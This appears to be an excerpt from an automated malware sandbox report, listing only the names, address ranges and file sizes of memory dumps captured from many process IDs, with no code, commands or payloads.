memory/596-258-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/596-320-0x000001C87E0D0000-0x000001C87E0FA000-memory.dmpFilesize
168KB
-
memory/648-302-0x00000254110D0000-0x00000254110FA000-memory.dmpFilesize
168KB
-
memory/648-248-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/660-224-0x0000000000000000-mapping.dmp
-
memory/708-223-0x0000000000000000-mapping.dmp
-
memory/720-257-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/720-319-0x0000023D3E3A0000-0x0000023D3E3CA000-memory.dmpFilesize
168KB
-
memory/748-284-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/804-222-0x0000000000000000-mapping.dmp
-
memory/804-527-0x0000000000000000-mapping.dmp
-
memory/824-221-0x0000000000000000-mapping.dmp
-
memory/908-308-0x0000029658550000-0x000002965857A000-memory.dmpFilesize
168KB
-
memory/908-254-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/996-250-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/996-305-0x0000025368950000-0x000002536897A000-memory.dmpFilesize
168KB
-
memory/1028-281-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1028-358-0x00000000015B0000-0x00000000015DA000-memory.dmpFilesize
168KB
-
memory/1140-259-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1140-321-0x000002B8CC5D0000-0x000002B8CC5FA000-memory.dmpFilesize
168KB
-
memory/1148-260-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1148-322-0x000001F5B30D0000-0x000001F5B30FA000-memory.dmpFilesize
168KB
-
memory/1160-261-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1160-323-0x000001FFBB2B0000-0x000001FFBB2DA000-memory.dmpFilesize
168KB
-
memory/1180-262-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1180-324-0x0000023760390000-0x00000237603BA000-memory.dmpFilesize
168KB
-
memory/1232-307-0x000002A63A180000-0x000002A63A1AA000-memory.dmpFilesize
168KB
-
memory/1232-246-0x0000000000000000-mapping.dmp
-
memory/1232-477-0x0000000000000000-mapping.dmp
-
memory/1232-306-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1280-263-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1280-325-0x0000022A20340000-0x0000022A2036A000-memory.dmpFilesize
168KB
-
memory/1328-531-0x0000000000000000-mapping.dmp
-
memory/1376-264-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1376-330-0x000001F8954D0000-0x000001F8954FA000-memory.dmpFilesize
168KB
-
memory/1392-198-0x0000000000000000-mapping.dmp
-
memory/1412-331-0x00000261A90D0000-0x00000261A90FA000-memory.dmpFilesize
168KB
-
memory/1412-265-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1428-335-0x0000027F1D6A0000-0x0000027F1D6CA000-memory.dmpFilesize
168KB
-
memory/1428-266-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1460-267-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1460-337-0x0000019863F90000-0x0000019863FBA000-memory.dmpFilesize
168KB
-
memory/1468-338-0x0000020114440000-0x000002011446A000-memory.dmpFilesize
168KB
-
memory/1468-268-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1500-197-0x0000000000000000-mapping.dmp
-
memory/1552-177-0x0000000000000000-mapping.dmp
-
memory/1576-269-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1576-342-0x0000025B0AB60000-0x0000025B0AB8A000-memory.dmpFilesize
168KB
-
memory/1608-270-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1608-344-0x00000284B8E50000-0x00000284B8E7A000-memory.dmpFilesize
168KB
-
memory/1644-345-0x000001FC57A70000-0x000001FC57A9A000-memory.dmpFilesize
168KB
-
memory/1644-271-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1664-351-0x0000000000000000-mapping.dmp
-
memory/1664-357-0x000001E74ED90000-0x000001E74EDBA000-memory.dmpFilesize
168KB
-
memory/1668-316-0x000001E7AFCD0000-0x000001E7AFCFA000-memory.dmpFilesize
168KB
-
memory/1668-311-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1668-312-0x0000000000000000-mapping.dmp
-
memory/1668-313-0x000001E7AFC20000-0x000001E7AFC4A000-memory.dmpFilesize
168KB
-
memory/1784-220-0x0000000000000000-mapping.dmp
-
memory/1808-346-0x0000027184AB0000-0x0000027184ADA000-memory.dmpFilesize
168KB
-
memory/1808-272-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1824-427-0x0000000000000000-mapping.dmp
-
memory/1832-273-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1832-347-0x00000206F0AD0000-0x00000206F0AFA000-memory.dmpFilesize
168KB
-
memory/1840-274-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1840-348-0x000001DE2B430000-0x000001DE2B45A000-memory.dmpFilesize
168KB
-
memory/1884-283-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1940-282-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/1968-303-0x0000000007030000-0x000000000707B000-memory.dmpFilesize
300KB
-
memory/1968-251-0x0000000005980000-0x000000000599C000-memory.dmpFilesize
112KB
-
memory/1968-235-0x00000000066F0000-0x0000000006756000-memory.dmpFilesize
408KB
-
memory/1968-232-0x0000000006680000-0x00000000066E6000-memory.dmpFilesize
408KB
-
memory/1968-239-0x00000000067B0000-0x0000000006B00000-memory.dmpFilesize
3.3MB
-
memory/1968-230-0x0000000005CB0000-0x0000000005CD2000-memory.dmpFilesize
136KB
-
memory/1968-217-0x0000000005D40000-0x0000000006368000-memory.dmpFilesize
6.2MB
-
memory/1968-214-0x0000000003340000-0x0000000003376000-memory.dmpFilesize
216KB
-
memory/1968-317-0x0000000006E30000-0x0000000006EA6000-memory.dmpFilesize
472KB
-
memory/2052-280-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2052-355-0x00000174D3FC0000-0x00000174D3FEA000-memory.dmpFilesize
168KB
-
memory/2088-183-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/2088-192-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/2088-182-0x0000000140002348-mapping.dmp
-
memory/2088-185-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/2088-181-0x0000000140000000-0x0000000140057000-memory.dmpFilesize
348KB
-
memory/2120-361-0x0000000000000000-mapping.dmp
-
memory/2124-487-0x0000000000000000-mapping.dmp
-
memory/2136-354-0x0000023A2DA70000-0x0000023A2DA9A000-memory.dmpFilesize
168KB
-
memory/2136-279-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2312-169-0x0000000000000000-mapping.dmp
-
memory/2348-277-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2348-352-0x0000024A8D400000-0x0000024A8D42A000-memory.dmpFilesize
168KB
-
memory/2356-353-0x000002610BE80000-0x000002610BEAA000-memory.dmpFilesize
168KB
-
memory/2356-278-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2408-276-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2408-350-0x000001B00D360000-0x000001B00D38A000-memory.dmpFilesize
168KB
-
memory/2460-275-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2460-349-0x0000021564AD0000-0x0000021564AFA000-memory.dmpFilesize
168KB
-
memory/2468-285-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2532-286-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2552-287-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2620-294-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2644-293-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2652-292-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2692-120-0x000001E230DC0000-0x000001E230FFC000-memory.dmpFilesize
2.2MB
-
memory/2692-176-0x000001E218320000-0x000001E218332000-memory.dmpFilesize
72KB
-
memory/2692-180-0x000001E218340000-0x000001E218346000-memory.dmpFilesize
24KB
-
memory/2692-122-0x000001E216200000-0x000001E21643B000-memory.dmpFilesize
2.2MB
-
memory/2692-123-0x000001E230B80000-0x000001E230DA4000-memory.dmpFilesize
2.1MB
-
memory/2696-295-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2792-483-0x0000000000000000-mapping.dmp
-
memory/2836-291-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/2948-191-0x0000000000000000-mapping.dmp
-
memory/3016-249-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/3016-304-0x0000000000C70000-0x0000000000C9A000-memory.dmpFilesize
168KB
-
memory/3132-296-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/3168-520-0x0000000000000000-mapping.dmp
-
memory/3232-199-0x0000000000000000-mapping.dmp
-
memory/3268-310-0x0000000000000000-mapping.dmp
-
memory/3268-315-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/3268-318-0x00000251343A0000-0x00000251343CA000-memory.dmpFilesize
168KB
-
memory/3312-482-0x0000000000000000-mapping.dmp
-
memory/3380-189-0x0000000000000000-mapping.dmp
-
memory/3444-188-0x0000000000000000-mapping.dmp
-
memory/3472-290-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/3488-513-0x0000000000000000-mapping.dmp
-
memory/3536-187-0x0000000000000000-mapping.dmp
-
memory/3536-485-0x0000000000000000-mapping.dmp
-
memory/3548-186-0x0000000000000000-mapping.dmp
-
memory/3624-229-0x00007FFB9BC80000-0x00007FFB9BD2E000-memory.dmpFilesize
696KB
-
memory/3624-225-0x00000207C13F0000-0x00000207C142C000-memory.dmpFilesize
240KB
-
memory/3624-242-0x00007FFB9BC80000-0x00007FFB9BD2E000-memory.dmpFilesize
696KB
-
memory/3624-240-0x00007FFB9D330000-0x00007FFB9D50B000-memory.dmpFilesize
1.9MB
-
memory/3624-227-0x00007FFB9D330000-0x00007FFB9D50B000-memory.dmpFilesize
1.9MB
-
memory/3700-245-0x0000000000000000-mapping.dmp
-
memory/3768-130-0x0000000000000000-mapping.dmp
-
memory/3768-473-0x0000000000000000-mapping.dmp
-
memory/3768-135-0x000001B5F6D80000-0x000001B5F6DA2000-memory.dmpFilesize
136KB
-
memory/3768-138-0x000001B5F6F30000-0x000001B5F6FA6000-memory.dmpFilesize
472KB
-
memory/3776-498-0x0000000000000000-mapping.dmp
-
memory/3956-194-0x0000000000000000-mapping.dmp
-
memory/3996-336-0x000001851FCA0000-0x000001851FCCA000-memory.dmpFilesize
168KB
-
memory/3996-333-0x000001851E260000-0x000001851E28A000-memory.dmpFilesize
168KB
-
memory/3996-334-0x0000000000000000-mapping.dmp
-
memory/4004-301-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/4016-507-0x0000000000000000-mapping.dmp
-
memory/4024-129-0x0000000000000000-mapping.dmp
-
memory/4056-289-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/4064-379-0x0000000000000000-mapping.dmp
-
memory/4068-504-0x0000000000401BEA-mapping.dmp
-
memory/4076-505-0x0000000000000000-mapping.dmp
-
memory/4164-175-0x0000000000000000-mapping.dmp
-
memory/4224-300-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/4224-166-0x0000000000000000-mapping.dmp
-
memory/4252-297-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/4256-195-0x0000000000000000-mapping.dmp
-
memory/4308-328-0x000001CFD01E0000-0x000001CFD020A000-memory.dmpFilesize
168KB
-
memory/4308-329-0x000001CFD0390000-0x000001CFD03BA000-memory.dmpFilesize
168KB
-
memory/4308-327-0x0000000000000000-mapping.dmp
-
memory/4312-167-0x0000000000000000-mapping.dmp
-
memory/4336-496-0x0000000000000000-mapping.dmp
-
memory/4356-203-0x0000000000000000-mapping.dmp
-
memory/4404-184-0x0000000000000000-mapping.dmp
-
memory/4468-298-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/4500-201-0x0000000000000000-mapping.dmp
-
memory/4508-200-0x0000000000000000-mapping.dmp
-
memory/4520-202-0x0000000000000000-mapping.dmp
-
memory/4608-431-0x0000000000000000-mapping.dmp
-
memory/4716-193-0x0000000000000000-mapping.dmp
-
memory/4796-179-0x0000000000000000-mapping.dmp
-
memory/4808-178-0x0000000000000000-mapping.dmp
-
memory/4816-479-0x0000000000000000-mapping.dmp
-
memory/4876-233-0x00000001400024C8-mapping.dmp
-
memory/4876-231-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/4876-236-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/4876-234-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/4876-237-0x00007FFB9D330000-0x00007FFB9D50B000-memory.dmpFilesize
1.9MB
-
memory/4876-238-0x00007FFB9BC80000-0x00007FFB9BD2E000-memory.dmpFilesize
696KB
-
memory/4876-243-0x0000000140000000-0x0000000140040000-memory.dmpFilesize
256KB
-
memory/4876-244-0x00007FFB9D330000-0x00007FFB9D50B000-memory.dmpFilesize
1.9MB
-
memory/4892-288-0x00007FFB5D3C0000-0x00007FFB5D3D0000-memory.dmpFilesize
64KB
-
memory/4952-393-0x0000000000000000-mapping.dmp
-
memory/4980-228-0x0000000000000000-mapping.dmp
-
memory/5012-190-0x0000000000000000-mapping.dmp